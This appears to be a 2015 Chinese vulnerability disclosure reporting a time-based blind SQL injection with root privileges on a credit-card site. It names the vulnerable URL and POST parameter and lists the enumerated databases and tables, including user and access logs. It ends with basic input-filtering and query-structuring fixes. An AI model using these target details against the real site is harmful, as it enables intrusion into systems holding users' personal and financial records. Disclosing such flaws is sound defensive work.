首页 > 安全 > 网站安全 >

我爱卡某站mysql注入(root权限)泄露大量敏感信息及解决方案

2015-05-23

我爱卡某站mysql注入详细说明: POST请求,URL:http: kaku 51credit com tag index html POST参数:cardNameHidden=&cardNameInput=11&searchNamePage=1存在问题的参数:cardNameInput是基于时间的盲注

我爱卡某站mysql注入

POST请求,

URL:http://kaku.51credit.com/tag/index.html

POST参数:cardNameHidden=&cardNameInput=11&searchNamePage=1

存在问题的参数:cardNameInput

是基于时间的盲注

2.jpg


6.jpg

权限比较高

1.jpg



可用的数据库

available databases [3]:

[*] auditdb

[*] information_schema

[*] woaikatags


Database: auditdb

[1 table]

+-----------+

| accesslog |

+-----------+


既然有访问日志这张表,那么说明有一些敏感信息可能会泄露


Database: woaikatags

[25 tables]

+-----------------------------------+

| crcredit_apply_2015_log |

| dict_city |

| dict_province |

| discount_activity |

| discount_activityershop |

| discount_activityspecial |

| discount_attribute |

| discount_images |

| discount_operation_log |

| discount_shop |

| discount_shopbrand |

| discount_specialeractivity |

| tag_cardassociationmoretags |

| tag_cardassociationtags |

| tag_cardseriesassociation_temp |

| tag_cardseriesassociationmoretags |

| tag_cardseriesassociationtags |

| tag_logoimage |

| tag_preferentialassociationtags |

| tag_preferentiaseriesmoretags |

| tag_tagcategory |

| tag_tagerbank |

| tag_taginitial |

| tag_tagrelevancecategory |

| tag_userlogs |

+-----------------------------------+


这里面也有很多日志 类似tag_userlogs crcredit_apply_2015_log用户日志等

没有去看具体数据。

解决方案:

1.过滤最基本的特殊字符 单引号

2.在业务没有影响的情况下过滤其他特殊字符 例如#,/,*,空格等

3.关键字的过滤,具体问题具体分析这 AND ,OR,一些复杂计算的函数方法等

4.构造结构化的SQL查询语句。

相关文章
最新文章
热点推荐